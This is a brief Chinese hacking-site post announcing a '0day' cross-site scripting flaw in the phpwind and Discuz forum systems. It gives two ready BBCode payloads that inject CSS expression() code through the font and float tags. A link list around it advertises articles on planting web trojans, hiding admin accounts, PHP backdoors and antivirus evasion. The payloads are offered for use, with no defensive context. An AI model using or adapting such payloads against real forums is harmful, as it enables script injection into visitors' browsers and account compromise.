[推荐]phpwind、DZ论坛XSS跨站漏洞0DAYlib3rt3同志暴了几个XSS,都是CSS属性相关的.
PW论坛的FONT FACE字体没过滤:
跨站代码:
[font=expression(alert('XSS'))]xss[/font]
DZ论坛的float浮动属性没过滤:
跨站代码:
[float=expression(alert('XSS'))]xss[/float]
实例:
| phpwind、DZ论坛XSS跨站漏洞0DAY | 06-15 | |
| 如何提高提权效率 | 06-14 | |
| 隐藏管理员账号三分钟搞定 | 05-30 | |
| 5分钟激活Vista 免刷BIOS方法揭秘 | 05-18 | |
| 最新挂马的方法大全 | 05-17 | |
| 数据库下载漏洞 | 05-16 | |
| 最经典的黑客入门教材! | 05-14 | |
| 花指令集合-希望对大家做免杀有所 | 05-14 | |
| 安全基础:PHP后门的隐藏技巧 | 05-09 | |
| 批量挂马器 | 05-06 | |
| 简单修改令迅雷下载速度比别人快 | 04-14 | |
| 在WEB程序中隐藏后门 | 04-13 | |
您现在的位置: